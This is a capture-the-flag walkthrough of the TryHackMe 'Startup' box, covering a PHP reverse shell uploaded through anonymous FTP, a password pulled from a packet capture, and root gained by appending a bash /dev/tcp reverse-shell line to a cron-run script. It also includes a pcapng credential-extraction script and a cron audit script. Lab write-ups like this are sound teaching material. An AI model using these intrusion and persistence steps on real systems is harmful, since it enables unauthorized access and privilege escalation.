【Tryhackme】Startup (Wireshark packet analysis, cron job privilege escalation)

Disclaimer

The host attacked in this article was tested with proper authorization. The tools and methods described here are for learning and exchange only. Do not use the tools or attack ideas in this article for any illegal purpose; I accept no responsibility for any consequences of doing so, nor for any misuse or damage caused.

Service scan

┌──(root💀kali)-[~]
└─# nmap -sV -Pn 10.10.171.61
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 02:51 EDT
Nmap scan report for 10.10.171.61
Host is up (0.32s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.61 seconds 

FTP, SSH and HTTP are open.

Anonymous FTP login

┌──(root💀kali)-[~/tryhackme/Startup]
└─# ftp 10.10.171.61
Connected to 10.10.171.61.
220 (vsFTPd 3.0.3)
Name (10.10.171.61:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 .
drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 ..
-rw-r--r--    1 0        0               5 Nov 12  2020 .test.log
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK. 

Download all of the files for local analysis. The ftp directory is empty, but note its mode, drwxrwxrwx: it is world-writable.

Contents of notice.txt

┌──(root💀kali)-[~/tryhackme/Startup]
└─# cat notice.txt 
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus. 

Maya may be a username worth trying over SSH.

important.jpg shows two lines of text:

Everybody asks who's the impostor
but nobody asks how's the impostor 

Nothing obviously useful there.

Attacking port 80

Opening the site on port 80 shows this message:

 No spice here!

Please excuse us as we develop our site. We want to make it the most stylish and convienient way to buy peppers. Plus, we need a web developer. BTW if you're a web developer, contact us. Otherwise, don't you worry. We'll be online shortly!

— Dev Team 

The page source contains a single comment:

when are we gonna update this?? 

Let's brute-force directories.

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.171.61

dirsearch v0.4.2

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.171.61/_21-11-06_03-07-44.txt

Error Log: /root/dirsearch/logs/errors-21-11-06_03-07-44.log

Target: http://10.10.171.61/

[03:07:45] Starting:
[03:08:41] 301 -  312B  - /files  ->  http://10.10.171.61/files/
[03:08:42] 200 -    1KB - /files/
[03:08:47] 200 -  808B  - /index.html

There is a /files directory, and its listing is identical to the FTP root: Apache is serving the anonymous FTP share at /files/. The attack path is then straightforward. Upload a PHP reverse shell over FTP into the ftp subdirectory, which we already know is world-writable, then request it over HTTP (it lands at /files/ftp/shell.php) so that Apache executes it and connects back to us. Set the IP and port inside the PHP file to the Kali address (here 10.13.21.169, port 1234) and start the listener before making the request.

Upload the webshell over FTP

┌──(root💀kali)-[~/tryhackme/Startup]
└─# ftp 10.10.171.61
Connected to 10.10.171.61.
220 (vsFTPd 3.0.3)
Name (10.10.171.61:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ftp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put /root/reverse-shell.php ./shell.php
local: /root/reverse-shell.php remote: ./shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
3460 bytes sent in 0.00 secs (28.6932 MB/s) 

Request the uploaded file over HTTP to trigger it; the reverse shell comes back as www-data:

┌──(root💀kali)-[~/tryhackme/Startup]
└─# nc -lnvp 1234 
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 46938
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 07:14:50 up 24 min,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data 

The filesystem root contains a file recipe.txt:

www-data@startup:/$ cat recipe.txt 
cat recipe.txt 
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love. 

What is the secret spicy soup recipe?

love

Lateral movement to lennie

Listing /home shows one user, lennie, but www-data has no permission to read that directory. /etc/passwd reveals another user, vagrant.

The filesystem root also contains a directory named incidents, owned by www-data, holding a file suspicious.pcapng. Transfer it back to Kali for analysis.

Opening the capture in Wireshark, it looks like the network traffic of a previous attacker's session with the box. Frame 177 contains lennie's password in cleartext:

c4ntg3t3n0ughsp1c3
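The capture above was worked through by clicking around in Wireshark. The following is an added example, not part of the original writeup: a minimal pcapng reader in pure Python that pulls TCP payloads out of Enhanced Packet Blocks and reports whatever is sent right after a "Password:" prompt, which is exactly the pattern that exposes lennie's credential in frame 177. The capture it parses is constructed inline to mimic that session (an attacker's reverse shell on port 4444 plus a stray HTTP request); it is not the box's suspicious.pcapng. The reader handles only little-endian Ethernet/IPv4/TCP captures and raises on anything else.

```python
import struct
from typing import Dict, Iterator, List, Tuple

# Constructed sample data: the two hosts from this writeup. The capture built
# below exists only for this demo; it is not the box's suspicious.pcapng.
ATTACKER, VICTIM = "10.13.21.169", "10.10.171.61"


def _ip(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def _block(btype: int, body: bytes) -> bytes:
    """pcapng block: type, total length, body padded to 4 bytes, total length again."""
    body += b"\x00" * (-len(body) % 4)
    total = 12 + len(body)
    return struct.pack("<II", btype, total) + body + struct.pack("<I", total)


def _tcp_frame(src: str, sport: int, dst: str, dport: int, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP segment wrapped in an Enhanced Packet Block (checksums left at 0)."""
    eth = b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0, _ip(src), _ip(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 0x50, 0x18, 65535, 0, 0)  # PSH|ACK, no options
    pkt = eth + ip + tcp + payload
    epb = struct.pack("<IIIII", 0, 0, 0, len(pkt), len(pkt)) + pkt  # iface, ts hi/lo, caplen, origlen
    return _block(6, epb)


def build_sample_capture() -> bytes:
    """A reverse shell in which the attacker types 'su lennie' and then the password in the clear."""
    shb = _block(0x0A0D0D0A, struct.pack("<IHHq", 0x1A2B3C4D, 1, 0, -1))  # little-endian, v1.0
    idb = _block(1, struct.pack("<HHI", 1, 0, 65535))                       # LINKTYPE_ETHERNET
    frames = [
        _tcp_frame(ATTACKER, 50000, VICTIM, 80, b"GET /files/ HTTP/1.1\r\nHost: startup\r\n\r\n"),
        _tcp_frame(VICTIM, 52346, ATTACKER, 4444, b"$ "),
        _tcp_frame(ATTACKER, 4444, VICTIM, 52346, b"su lennie\n"),
        _tcp_frame(VICTIM, 52346, ATTACKER, 4444, b"Password: "),
        _tcp_frame(ATTACKER, 4444, VICTIM, 52346, b"c4ntg3t3n0ughsp1c3\n"),
        _tcp_frame(VICTIM, 52346, ATTACKER, 4444, b"lennie@startup:/$ "),
    ]
    return shb + idb + b"".join(frames)


def tcp_payloads(pcapng: bytes) -> Iterator[Tuple[int, str, bytes]]:
    """Yield (frame number, 'src:sport -> dst:dport', payload) for each TCP segment carrying data."""
    off, frame = 0, 0
    while off + 12 <= len(pcapng):
        btype, total = struct.unpack_from("<II", pcapng, off)
        if total < 12 or off + total > len(pcapng):
            raise ValueError(f"corrupt block at offset {off}")
        body = pcapng[off + 8: off + total - 4]
        off += total
        if btype == 0x0A0D0D0A and struct.unpack_from("<I", body)[0] != 0x1A2B3C4D:
            raise ValueError("big-endian section; this minimal reader only handles little-endian")
        if btype != 6:                      # only Enhanced Packet Blocks carry frames here
            continue
        frame += 1                          # Wireshark's frame.number counts packet blocks
        caplen = struct.unpack_from("<I", body, 12)[0]
        pkt = body[20: 20 + caplen]
        if len(pkt) < 54 or pkt[12:14] != b"\x08\x00" or pkt[23] != 6:  # need Ethernet+IPv4+TCP
            continue
        ihl = (pkt[14] & 0x0F) * 4
        src = ".".join(map(str, pkt[26:30]))
        dst = ".".join(map(str, pkt[30:34]))
        tcp = 14 + ihl
        sport, dport = struct.unpack_from("!HH", pkt, tcp)
        doff = (pkt[tcp + 12] >> 4) * 4
        payload = pkt[tcp + doff:]
        if payload:
            yield frame, f"{src}:{sport} -> {dst}:{dport}", payload


def find_credentials(pcapng: bytes) -> List[Tuple[int, str, str]]:
    """Return (frame, flow, secret) for the data sent right after a 'Password:' prompt.

    The prompt travels server -> client and the secret client -> server, so the
    flow to watch is the reverse of the one that carried the prompt.
    """
    awaiting: Dict[str, bool] = {}
    hits: List[Tuple[int, str, str]] = []
    for frame, flow, payload in tcp_payloads(pcapng):
        if awaiting.pop(flow, False):
            hits.append((frame, flow, payload.decode("latin-1").strip()))
        elif b"password:" in payload.lower():
            src, dst = flow.split(" -> ")
            awaiting[f"{dst} -> {src}"] = True
    return hits


if __name__ == "__main__":
    for frame, flow, secret in find_credentials(build_sample_capture()):
        print(f"frame {frame}: {flow} sent {secret!r}")
```

For the real file, pass open('suspicious.pcapng', 'rb').read() to find_credentials. For a quick manual check of one frame the tshark equivalent is tshark -r suspicious.pcapng -Y 'frame.number == 177' -x, which hex-dumps just that frame.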

Grab user.txt

www-data@startup:/tmp$ su lennie
su lennie
Password: c4ntg3t3n0ughsp1c3

lennie@startup:/tmp$ cd /home
cd /home
lennie@startup:/home$ ls
ls
lennie
lennie@startup:/home$ cd lennie
cd lennie
lennie@startup:~$ ls
ls
Documents  scripts  user.txt

Privilege escalation to root

Look at the scripts directory and the script inside it:

lennie@startup:~$ cd scripts
cd scripts
lennie@startup:~/scripts$ ls -alh
ls -alh
total 16K
drwxr-xr-x 2 root   root   4.0K Nov 12  2020 .
drwx------ 6 lennie lennie 4.0K Nov  6 08:43 ..
-rwxr-xr-x 1 root   root     77 Nov 12  2020 planner.sh
-rw-r--r-- 1 root   root      1 Nov  6 08:57 startup_list.txt
lennie@startup:~/scripts$ cat planner.sh 
cat planner.sh 
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"
lennie@startup:~/scripts$ ls -alh /etc/print.sh
ls -alh /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12  2020 /etc/print.sh

Analysis

planner.sh is owned by root, and its name suggests it is run by a scheduled task. The timestamps back that up: startup_list.txt, which planner.sh rewrites, is owned by root and was modified at 08:57 today, so root is executing the script periodically (confirm the schedule with cat /etc/crontab and a look in /etc/cron.d before relying on it). lennie has no write access to planner.sh itself. But planner.sh calls a second script, /etc/print.sh, and that file is owned by lennie with mode rwx------. Anything lennie appends to /etc/print.sh therefore runs as root the next time the job fires. Append rather than overwrite, so the job keeps behaving normally and nothing looks broken.
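As an added example, not from the original writeup, here is the audit a tester or defender would script to find this class of bug instead of stumbling on it: parse a system crontab for root entries, follow each script to the .sh files it calls, and flag any of them that the current user can write. The .sh-path match is a heuristic (it does not follow PATH lookups or sourced files), and the sample crontab and scripts used to exercise it are constructed; the box's real /etc/crontab is not shown in this writeup.

```shell
#!/bin/sh
# Added audit helper: given a system-format crontab, list the scripts root runs
# from it and flag any script, or any .sh file it calls, that the current
# unprivileged user can modify. Every flagged path is a root code-execution
# primitive of the /etc/print.sh kind.

# Commands run by root entries in a system crontab (field 6 is the user).
root_cron_commands() {
    grep -vE '^[[:space:]]*(#|$)' "$1" |
        awk '$6 == "root" { $1 = $2 = $3 = $4 = $5 = $6 = ""; sub(/^ +/, ""); print }'
}

# Absolute *.sh paths referenced inside a script, one per line, deduplicated.
# Heuristic: only literal paths ending in .sh followed by whitespace or end of line.
called_scripts() {
    grep -oE '/[A-Za-z0-9_./-]+\.sh([[:space:]]|$)' "$1" | sed 's/[[:space:]]*$//' | sort -u
}

# Check a cron-invoked script plus everything it calls. Prints WRITABLE/ok per
# path and returns 1 if the current user could modify any of them.
check_cron_script() {
    rc=0
    for dep in "$1" $(called_scripts "$1"); do
        if [ -w "$dep" ]; then
            echo "WRITABLE $dep"
            rc=1
        else
            echo "ok       $dep"
        fi
    done
    return $rc
}

# Audit every root entry of the given crontab file; returns 1 if anything is writable.
audit_crontab() {
    rc=0
    for script in $(root_cron_commands "$1" | awk '{ print $1 }'); do
        [ -f "$script" ] || continue        # skips shell builtins such as 'cd' and missing files
        echo "== $script"
        check_cron_script "$script" || rc=1
    done
    return $rc
}

# Usage on the box, as lennie:  sh cron_audit.sh /etc/crontab
if [ "$#" -gt 0 ]; then
    audit_crontab "$1"
fi
```

If /etc/crontab is what launches planner.sh, running this as lennie prints the planner.sh entry with /etc/print.sh marked WRITABLE, which is the finding the manual analysis above reached by hand.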

Attack

Append a reverse shell to /etc/print.sh

lennie@startup:~/scripts$ echo "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"
bash -i >& /dev/tcp/10.13.21.169/4242 0>&1

Start a listener on port 4242 and wait about a minute for cron to run the job; the connection comes back as root.

┌──(root💀kali)-[~/tryhackme/Startup]
└─# nc -lnvp 4242 
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 49342
bash: cannot set terminal process group (2909): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@startup:~# cat /root/root.txt
cat /root/root.txt 